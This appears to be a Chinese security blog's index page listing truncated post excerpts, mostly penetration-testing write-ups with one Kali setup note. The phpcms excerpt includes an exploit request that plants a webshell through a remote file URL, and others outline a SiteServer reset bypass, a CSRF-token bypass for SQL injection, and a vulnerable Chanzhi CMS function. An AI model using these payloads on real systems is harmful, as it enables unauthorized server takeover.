热门 phpcms前台getshell(附:注入)

时间:2017-4-10   作者:webbaozi   分类: 渗透测试   热度:4930°    
时间:2017-4-10   分类: 渗透测试    热度:4930  
1.phpcms文件上传,需要网站开启注册功能 http://192.168.107.138/phpcms/index.php?m=member&c=index&a=register&siteid=1 POST:siteid=1&modelid=11&username=123456&password=123456&[email protected]&info[content]=<img src=http://www.webbaozi.com/phpcmsv9/v9.txt?.php#.jpg>...

阅读全文>>

热门 siteserver简单getshell

时间:2017-3-10   作者:webbaozi   分类: 渗透测试   热度:4539°    
时间:2017-3-10   分类: 渗透测试    热度:4539  
1.忘记密码处 1.1登录确定账号   1.2点击忘记密码 然后回答问题,随便填写一个然后抓包,删除填写的内容     然后放包。         2.文件上传 http://wooyun.webbaozi.com/static/bugs/wooyun-2014-053085.html 首先勾选上返回包。   访问地址:htt...

阅读全文>>

热门 kali linux2.0安装vmware-tools方法更新版

时间:2017-3-5   作者:webbaozi   分类: 个人笔记   热度:1462°    
时间:2017-3-5   分类: 个人笔记    热度:1462  
众所周知,我们用vmware的时候总要安装vmware-tools来方便我们与宿主机共享文件,这也极大地方便了我们的操作;所以安装也是必要的选择,但是很少有人能了解这里面的原理,小编这就把自己的经验和大家分享一下,给新手朋友提供借鉴!大牛请绕过~~~ 0X01:首先在终端输入命令:apt-get install linux-headers-$(uname -r)来查看是否有内核头文件;这也是安装vmware-tools的准备工作之一;然而很多时候很不幸的看到的结果是无法定位软件包或者找不到内核头文件;不要着急,小编帮你解决;请看下一步: 0X02:这时,小...

阅读全文>>

热门 使用burp macros和sqlmap绕过csrf防护进行sql注入

时间:2017-3-5   作者:webbaozi   分类: 小技巧   热度:2181°    
时间:2017-3-5   分类: 小技巧    热度:2181  
前言 有很多工具可以用来对web应用进行自动化测试。其中最有名的应当是sqlmap。Sqlmap让你轻松的通过命令行确认和利用SQL注入漏洞。然而,一些像CSRF、tokens或者简单的的反自动化技术如在一个表单中包含一个隐藏值就能够阻止自动化工具正确的工作。Burp Suite中的Macros是一个绕过这些方法去进行自动化测试的优秀方法,虽然它实现起来有些复杂。 在本文中我们将用一个简单的web程序作为例子,用户可以用这个程序搜索动物的图片。 这是一个使用SQL Server做后端数据库的ASP.NET程序。它有SQL盲注漏洞。我...

阅读全文>>

热门 蝉知getshell

时间:2017-2-27   作者:webbaozi   分类: 代码审计   热度:2200°    
时间:2017-2-27   分类: 代码审计    热度:2200  
漏洞文件: /system/module/file/model.php public function pasteImage($data, $uid) { $data = str_replace('"', '"', $data); if(!$this->checkSavePath()) return false; ini_set('pcre.backtrack_limit', strlen($data)); preg_match_all('/<img...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1